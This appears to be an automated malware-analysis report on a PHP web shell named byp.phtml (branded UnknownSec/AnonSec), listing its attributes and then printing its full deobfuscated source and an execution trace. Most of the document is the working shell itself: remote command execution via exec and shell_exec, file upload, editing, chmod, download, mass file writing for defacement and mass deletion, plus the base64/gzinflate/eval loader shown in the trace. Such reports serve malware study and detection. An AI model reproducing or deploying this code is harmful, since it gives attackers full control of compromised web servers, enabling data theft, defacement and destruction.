PHP Malware Analysis
byp.phtml
md5: 819a70ce9462e4de6c51f3e478afdf99
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- unknownsec1337@gmail.com (Deobfuscated, Traces)
Encoding
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Traces)
- php_uname (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- eval (Original, Traces)
- exec (Deobfuscated, Traces)
- shell_exec (Deobfuscated, Traces)
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
- file_put_contents (Deobfuscated)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- " . $_SERVER['HTTP_HOST'] . " - {$▛} 403 (Deobfuscated)
- ".$_SERVER[\'HTTP_HOST\']." - $▛ 403 (Traces)
- localhost - UnknownSec 403 (HTML)
URLs
- ftp.sh/AnonSec.jpg (Deobfuscated, Traces)
- ftp.sh/main/style.css (Deobfuscated, HTML, Traces)
Deobfuscated PHP code
<?php
set_time_limit(0);
error_reporting(0);
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
eval /* PHPDeobfuscator eval output */ {
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if (isset($_GET['option']) && $_POST['opt'] == 'download') {
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="' . $_POST['name'] . '"');
echo file_get_contents($_POST['path']);
exit;
}
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
function ▟($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function dc($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function ip()
{
$ipas = '';
if (getenv('HTTP_CLIENT_IP')) {
$ipas = getenv('HTTP_CLIENT_IP');
} else {
if (getenv('HTTP_X_FORWARDED_FOR')) {
$ipas = getenv('HTTP_X_FORWARDED_FOR');
} else {
if (getenv('HTTP_X_FORWARDED')) {
$ipas = getenv('HTTP_X_FORWARDED');
} else {
if (getenv('HTTP_FORWARDED_FOR')) {
$ipas = getenv('HTTP_FORWARDED_FOR');
} else {
if (getenv('HTTP_FORWARDED')) {
$ipas = getenv('HTTP_FORWARDED');
} else {
if (getenv('REMOTE_ADDR')) {
$ipas = getenv('REMOTE_ADDR');
} else {
$ipas = 'IP tidak dikenali';
}
}
}
}
}
}
return $ipas;
}
function ekse()
{
$cmd = "whoami";
$return = "";
$output = "";
$methodArray = array();
//exec()
$return = "";
$output = "";
exec($cmd, $output, $return);
if (strlen($output[0]) > 0 && true) {
$methodArray[] = "exec";
}
//shell_exec()
$return = "";
$output = "";
$output = shell_exec($cmd);
if (strlen($output) > 0) {
$methodArray[] = "shell_exec";
}
return $methodArray;
}
function ekseCMD($cmd, $method)
{
if ($method == "") {
ob_start();
$methodArray = ekse();
ob_end_clean();
if (is_array($methodArray)) {
$method = $methodArray[0];
}
}
switch ($method) {
case "exec":
exec($cmd, $output);
var_dump($output);
break;
case "shell_exec":
echo shell_exec($cmd);
break;
}
}
$cmd = htmlspecialchars($_POST["cmd"]);
$method = htmlspecialchars($_POST["execCMD"]);
function p($file)
{
$p = fileperms($file);
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x100 ? 'r' : '-';
$i .= $p & 0x80 ? 'w' : '-';
$i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
$i .= $p & 0x20 ? 'r' : '-';
$i .= $p & 0x10 ? 'w' : '-';
$i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
$i .= $p & 0x4 ? 'r' : '-';
$i .= $p & 0x2 ? 'w' : '-';
$i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
return $i;
}
echo "\r\n<!DOCTYPE HTML>\r\n<html>\r\n\t<head>\r\n\t\t<meta name='author' content='{$▛}'>\r\n\t\t<meta name='robots' content='NOINDEX, NOFOLLOW'>\r\n\t\t<title>" . $_SERVER['HTTP_HOST'] . " - {$▛} 403</title>\r\n\t\t<meta name='viewport' content='width=device-width, initial-scale=0.70, user-scalable=no'>\r\n\t\t<link rel='stylesheet' href='//unknownsec.ftp.sh/main/style.css'>\r\n\t\t<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\r\n\t\t<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>\r\n\t</head>\r\n<body class='bg-secondary text-light'>\r\n<div class='container-fluid'>\r\n\t<div class='py-3' id='main'>\r\n\t\t<div class='box shadow bg-dark p-4 rounded-3'>\r\n\t\t<a class='text-decoration-none text-light' href='" . $_SERVER['PHP_SELF'] . "'><h4>{$▛} Bypass <i class='bi bi-bug-fill'></i> 403</h4></a>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<i class=\"bi bi-hdd-rack\"></i> : <a class=\"text-decoration-none text-light\" href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a class=\"text-decoration-none\" href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo " [ " . ▟($path, p($path)) . " ]";
echo "\r\n<div class='dropdown'>\r\n\t<button class='btn btn-outline-light dropdown-toggle btn-sm' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='bi bi-menu-down'></i> Menu</button>\r\n\t<div class='dropdown-menu'>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=upload'><i class='bi bi-upload'></i> Upload</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=depes'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=delete'><i class='bi bi-trash'></i> Mass delete</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=cmd'><i class='bi bi-terminal'></i> Terminal</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=info'><i class='bi bi-info-circle'></i> Info server</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=about'><i class='bi bi-info'></i> About</a></h5>\r\n\t</div>\r\n</div>";
// tools nya
if (isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
for ($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if ($i != $c_dir) {
} elseif ($_GET['id'] == 'depes') {
function mass_kabeh($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$▚}<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function mass_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$dirb}/{$namafile}<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif ($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<br />{$▘}\r\n<form method='post'>\r\n\t<b>Tipe:</b><br>\r\n<div class='custom-control custom-switch'>\r\n\t<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>\r\n\t<label class='custom-control-label' for='customSwitch'>Biasa</label>\r\n</div>\r\n<div class='custom-control custom-switch'>\r\n\t<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>\r\n\t<label class='custom-control-label' for='customSwitch1'>Massal</label>\r\n</div>\r\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\r\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\r\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> Your script:</b>\r\n\t<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />\r\n\t<input type='submit' name='start' value='Go' class='btn btn-outline-light'>\r\n</form>";
}
} elseif ($_GET['id'] == 'info') {
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<font color=green>NONE</font>";
} else {
$disfc = "<font color=red>{$disfunc}</font>";
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = @ini_get(strtolower("safe_mode")) == 'on' ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<b>Uname: </b><font color=green>" . php_uname() . "</font><br />";
echo "<b>Software: </b><font color=green>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br />";
echo "<b>PHP version: </b><font color=green>PHP_VERSION</font> <b>PHP os:</b> <font color=green>PHP_OS</font><br />";
echo "<b>Server Ip: </b><font color=green>" . gethostbyname($_SERVER['HTTP_HOST']) . "</font><br />";
echo "<b>Your Ip: </b><font color=green>" . ip() . "</font><br />";
echo "<b>User: </b><font color=green>{$user}</font> ({$uid}) | <b>Group:</b> <font color=green>{$group}</font> ({$gid})<br />";
echo "<b>Safe Mode: </b>{$sm}<br />";
echo "<kbd>Disable Function:</kbd><pre>{$disfc}</pre>";
echo "</div>\r\n\t</div>\r\n</div>";
} elseif ($_GET['id'] == 'about') {
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<img alt='AnonSec Team' class='img-thumbnail rounded mx-auto d-block' src='//unknownsec.ftp.sh/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
echo "</div>\r\n\t</div>\r\n</div>";
} elseif ($_GET['id'] == 'cmd') {
echo "{$▘}<br>\r\n<form method='POST'>\r\n<div class='input-group mb-3'>\r\n\t<input class='form-control' type='text' name='cmd' value='{$cmd}'>\r\n\t<select class='bg-dark text-light form-control' name='execCMD'>\r\n\t\t<option>{$method}</option>";
ob_start();
$methodArray = ekse();
ob_end_clean();
foreach ($methodArray as $value) {
echo "<option>{$value}</option>";
}
echo "</select>\r\n\t</div>\r\n</form>";
if ($cmd == "") {
echo "\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<pre>";
ekseCMD("whoami", $method);
echo "</pre>\r\n\t</div>\r\n</div>";
} else {
echo "\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<pre><kbd>~\$ " . $cmd . "</kbd><br>";
ekseCMD($cmd, $method);
echo "</pre>\r\n\t</div>\r\n</div>";
}
} elseif ($_GET['id'] == 'upload') {
echo '<br />' . $▘ . '
<form action="" method="post" enctype="multipart/form-data">
<div class="input-group mb-3 text-center">
<input type="file" class="form-control form-control-sm" name="file">
<button type="submit" class="btn btn-outline-light btn-sm">Submit</button>
</div>
</form>';
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success upload",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed upload",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
} elseif ($_GET['id'] == 'delete') {
function hapus_massal($dir, $namafile)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
if (file_exists("{$dir}/{$namafile}")) {
unlink("{$dir}/{$namafile}");
}
} elseif ($dirb === '..') {
if (file_exists("" . dirname($dir) . "/{$namafile}")) {
unlink("" . dirname($dir) . "/{$namafile}");
}
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
if (file_exists($▚)) {
echo "[<font color=green>deleted</font>] {$▚}<br>";
unlink($▚);
$▟ = hapus_massal($dirc, $namafile);
}
}
}
}
}
}
}
if ($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />{$▘}\r\n<form method='post'>\r\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\r\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\r\n\t<div class='input-group mb-3'>\r\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>\r\n\t<div class='input-group-append'>\r\n\t<input class='btn btn-outline-light' type='submit' name='start' value='Go'>\r\n</form>\r\n\t</div>\r\n\t</div>";
}
}
}
// akhir tools
if (isset($_GET['filesrc'])) {
echo "<br><b>name : </b>" . basename($_GET['filesrc']);
"</br>";
echo '<textarea class="form-control" rows="7" readonly> ' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea><br />';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '<br><b>name : </b>' . basename($_POST['path']);
'</br>';
//Chmod
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success Change Permission",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change permission",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '"/>
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="chmod">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_GET['opt'] == 'btw') {
$cwd = getcwd();
echo '<form action="?option&path=' . $cwd . '&opt=delete&type=buat" method="POST">
<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
<input class="form-control" type="hidden" name="path" value="' . $cwd . '">
<input class="form-control" type="hidden" name="opt" value="delete">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success change name",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change name",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="' . $_POST['name'] . '" />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="rename">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Edit file Success",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed edit file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="edit">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form><br />';
}
} else {
//delete dir
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete dir",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete dir",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete file",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
}
echo "</center>";
$scandir = scandir($path);
$pa = getcwd();
echo "<div class=\"table-responsive\">\r\n<table class=\"table table-hover table-dark text-light\">\r\n<thead>\r\n<tr>\r\n\t<td class=\"text-center\">Name</td>\r\n\t\t<td class=\"text-center\">Last edit</td>\r\n\t\t<td class=\"text-center\">Size</td>\r\n\t\t<td class=\"text-center\">Permission</td>\r\n\t<td class=\"text-center\">Options</td>\r\n</tr>\r\n</thead>\r\n<tbody class=\"text-nowrap\">";
foreach ($scandir as $dir) {
$dt = date("Y-m-d", filemtime("{$path}/{$dir}"));
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "\r\n\t<tr>\r\n\t<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path={$path}/{$dir}\">{$dir}</a></td>\r\n\t<td><center>{$dt}</center></td>\r\n\t<td><center>DIR</center></td>\r\n\t<td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\r\n\t<td>\r\n<form method=\"POST\" action=\"?option&path={$path}\">\r\n<div class='input-group mb-3 text-center'>\r\n<select class=\"form-select form-select-sm\" name=\"opt\">\r\n\t<option selected disabled>Select</option>\r\n\t<option value=\"delete\">Delete</option>\r\n\t<option value=\"chmod\">Chmod</option>\r\n\t<option value=\"rename\">Rename</option>\r\n</select>\r\n\t<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n\t\t<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>\r\n\t</form>\r\n</div>\r\n</td>\r\n</tr>";
}
foreach ($scandir as $file) {
$ft = date("Y-m-d", filemtime("{$path}/{$file}"));
if (!is_file($path . '/' . $file)) {
continue;
}
$s = filesize($path . '/' . $file) / 1024;
$s = round($s, 3);
if ($s >= 1024) {
$s = round($s / 1024, 2) . ' MB';
} else {
$s .= ' KB';
}
echo "\r\n\t<tr>\r\n\t<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\r\n\t<td><center>{$ft}</center></td>\r\n\t<td><center>{$s}</center></td>\r\n\t<td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\r\n\t<td>\r\n<form method=\"POST\" action=\"?option&path={$path}\">\r\n<div class='input-group mb-3 text-center'>\r\n<select class=\"form-select form-select-sm\"name=\"opt\">\r\n\t<option selected disabled>Select</option>\r\n\t\t<option value=\"delete\">Delete</option>\r\n\t\t<option value=\"edit\">Edit</option>\r\n\t\t<option value=\"rename\">Rename</option>\r\n\t\t<option value=\"chmod\">Chmod</option>\r\n\t<option value=\"download\">Download</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n\t\t<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>\r\n\t</form>\r\n</div>\r\n</td>\r\n</tr>";
}
}
echo "\r\n</tbody>\r\n</table>\r\n<div class='text-center'>\r\n\t<kbd>Copyright © " . date("Y") . " - {$▛}</kbd>\r\n</div>\r\n\t</div>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\r\n<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>\r\n<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\r\n</body>\r\n</html>";
};Execution traces
data/traces/819a70ce9462e4de6c51f3e478afdf99_trace-1676249448.5289.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:51:14.426750]
1 0 1 0.000144 393512
1 3 0 0.000222 404712 {main} 1 /var/www/html/uploads/byp.phtml 0 0
2 4 0 0.000239 404712 set_time_limit 0 /var/www/html/uploads/byp.phtml 2 1 0
2 4 1 0.000257 404776
2 4 R FALSE
2 5 0 0.000271 404744 error_reporting 0 /var/www/html/uploads/byp.phtml 3 1 0
2 5 1 0.000285 404784
2 5 R 22527
2 6 0 0.000298 404744 ini_set 0 /var/www/html/uploads/byp.phtml 4 2 'error_log' NULL
2 6 1 0.000313 404816
2 6 R ''
2 7 0 0.000327 404744 ini_set 0 /var/www/html/uploads/byp.phtml 5 2 'log_errors' 0
2 7 1 0.000341 404816
2 7 R '1'
2 8 0 0.000354 404744 ini_set 0 /var/www/html/uploads/byp.phtml 6 2 'max_execution_time' 0
2 8 1 0.000368 404784
2 8 R '0'
2 9 0 0.000381 404712 ini_set 0 /var/www/html/uploads/byp.phtml 7 2 'output_buffering' 0
2 9 1 0.000396 404784
2 9 R FALSE
2 10 0 0.000409 404712 ini_set 0 /var/www/html/uploads/byp.phtml 8 2 'display_errors' 0
2 10 1 0.000423 404784
2 10 R ''
2 11 0 0.000436 404712 base64_decode 0 /var/www/html/uploads/byp.phtml 9 1 '7TztcttGkr/pKr/DBMUzyFoRkGxlnZJIZh1LclxnWy5LuWzKcrFAYEjCxNcCoCWuo32M1Nbuj323PMl2T88AAxCkaMvxxnf3wxYw058zPT3dPQO2f/3ln2zAzB+ieRRfRmfcNQ/v3mn/+svfodXoZ/ky4MPcGQf8vednSeAsD6I44ofXfZv6DAC/e8efdPws43mnPXpyfP7ajJPcjyPzTZfdu8fao5enZ9RovmED4OYBqyB2PLP7/u6d1ow7Hk875uM4ynmU9/Jlwg9Yzq9yGxj6kdk9bIA6AnHizEc+B8zJc8edhdB+yCZ+wCMn5APDtBRrfDffWKYhaHF3FncQbDTl+cglgllHASdOPgPRBeSVn3fw4VpqiQihM/Xd0V8Wcc6z0TRxO12hxiROOQghyTAnY+05Xw6G7XdOsOACpCVZYAeMBMvy1E+ywMlmHNgTHOp6LRlOFpGLCrJff/lXp+356U476bL3KAmrDriSGTtbMH3/AOqVLtSB8SDjOgRo'
2 11 1 0.000482 412936
2 11 R '�<�r�F���*��\004�3�Z\021�le��Hf\035Kr\\g[.K�l�r�@`H���\002�%��}����}�<�vO�\000\003\020�h���w��\0260ӟ3==�=\003���l��\037�y\024_Fg�5\017��i���ߡ��g�2���\031\a���gI�,\017�8��}��\f\000�{ǟt�,�y�=zr|�ڌ�#�M�ݻ�ڣ��g�h�a\003��\001� v<����;\036O;��8�y���e�\017Xίr\033\030���=l�:\002q��G>\a��sǝ��~�&~�#\'�\003ô\024k|7�X�!hqw\026w\020l4��%�YG\001\'N>\003�\005䕟w��Zj�\b�3���_\026qγ�4q;]��$N9\b!�0\'c�9_\016��wN��\002�%Y`\a�\004���O���f\034�\023\034�z-\031N\026��\n�_�W���N;�(\t�\016��\031;[0}�\000�.�'
2 12 0 0.000623 412904 gzinflate 0 /var/www/html/uploads/byp.phtml 9 1 '�<�r�F���*��\004�3�Z\021�le��Hf\035Kr\\g[.K�l�r�@`H���\002�%��}����}�<�vO�\000\003\020�h���w��\0260ӟ3==�=\003���l��\037�y\024_Fg�5\017��i���ߡ��g�2���\031\a���gI�,\017�8��}��\f\000�{ǟt�,�y�=zr|�ڌ�#�M�ݻ�ڣ��g�h�a\003��\001� v<����;\036O;��8�y���e�\017Xίr\033\030���=l�:\002q��G>\a��sǝ��~�&~�#\'�\003ô\024k|7�X�!hqw\026w\020l4��%�YG\001\'N>\003�\005䕟w��Zj�\b�3���_\026qγ�4q;]��$N9\b!�0\'c�9_\016��wN��\002�%Y`\a�\004���O���f\034�\023\034�z-\031N\026��\n�_�W���N;�(\t�\016��\031;[0}�\000�.�'
2 12 1 0.000827 437512
2 12 R '$▛ = \'UnknownSec\';\r\n$▘ = "<style>table{display:none;}</style>";\r\n\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'download\'){\r\n\theader(\'Content-type: text/plain\');\r\n\theader(\'Content-Disposition: attachment; filename="\'.$_POST[\'name\'].\'"\');\r\necho(file_get_contents($_POST[\'path\']));\r\nexit();\r\n}\r\n\r\nif(get_magic_quotes_gpc()){\r\n\tforeach($_POST as $key=>$value){\r\n\t\t$_POST[$key] = stripslashes($value);\r\n\t}\r\n}\r\n\r\nfunction ▟($dir,$p) {\r\nif (isset($_GET'
2 13 0 0.001511 557824 eval 1 '$▛ = \'UnknownSec\';\r\n$▘ = "<style>table{display:none;}</style>";\r\n\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'download\'){\r\n\theader(\'Content-type: text/plain\');\r\n\theader(\'Content-Disposition: attachment; filename="\'.$_POST[\'name\'].\'"\');\r\necho(file_get_contents($_POST[\'path\']));\r\nexit();\r\n}\r\n\r\nif(get_magic_quotes_gpc()){\r\n\tforeach($_POST as $key=>$value){\r\n\t\t$_POST[$key] = stripslashes($value);\r\n\t}\r\n}\r\n\r\nfunction ▟($dir,$p) {\r\nif (isset($_GET[\'path\'])) {\r\n\t$▚ = $_GET[\'path\'];\r\n} else {\r\n\t$▚ = getcwd();\r\n}\r\nif (is_writable($▚)) {\r\n\treturn "<font color=\'green\'>".$p."</font>";\r\n} else {\r\n\treturn "<font color=\'red\'>".$p."</font>";\r\n\t}\r\n}\r\n\r\nfunction dc($dir,$p) {\r\nif (isset($_GET[\'path\'])) {\r\n\t$▚ = $_GET[\'path\'];\r\n} else {\r\n\t$▚ = getcwd();\r\n}\r\nif (is_writable($▚)) {\r\n\treturn "<font color=\'green\'>".$p."</font>";\r\n} else {\r\n\treturn "<font 